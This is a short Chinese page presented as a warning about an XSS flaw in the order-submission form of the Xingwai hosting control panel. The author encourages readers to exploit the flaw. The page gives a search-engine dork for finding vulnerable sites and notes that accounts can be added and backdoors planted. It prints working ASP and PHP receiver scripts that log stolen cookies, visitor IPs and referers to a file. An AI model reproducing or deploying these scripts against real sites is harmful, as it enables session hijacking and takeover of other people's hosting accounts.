星外订单提交处过滤不严导致XSS漏洞预警 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    google or baidu 搜索 inurl:user/order.asp?type=虚拟主机

    暂时只会XSS偷取cookie

    可以加帐号 可以后台挂马 等等等等 自己利用吧,

星外订单提交处过滤不严导致XSS漏洞预警

    XXS 偷取cookie代码

   

    news.asp代码:

    <%

    msg=Request.ServerVariables("QUERY_STRING")

    testfile=Server.MapPath("cook.txt")

    set fs=server.CreateObject("scripting.filesystemobject")

    set thisfile=fs.OpenTextFile(testfile,8,True,0)

    thisfile.Writeline(""&msg& "")

    thisfile.close

    set fs = nothing

    %>

    PHP版代码:

   

    $cookie = $_GET['c'];

    $ip = getenv ('REMOTE_ADDR');

    $time=date("j F, Y, g:i a");

    $referer=getenv ('HTTP_REFERER');

    $fp = fopen('cook.txt', 'a');

    fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$time. '
Referer: '.$referer.'


');

    fclose($fp);

    ?>

    BY :CY

最新文章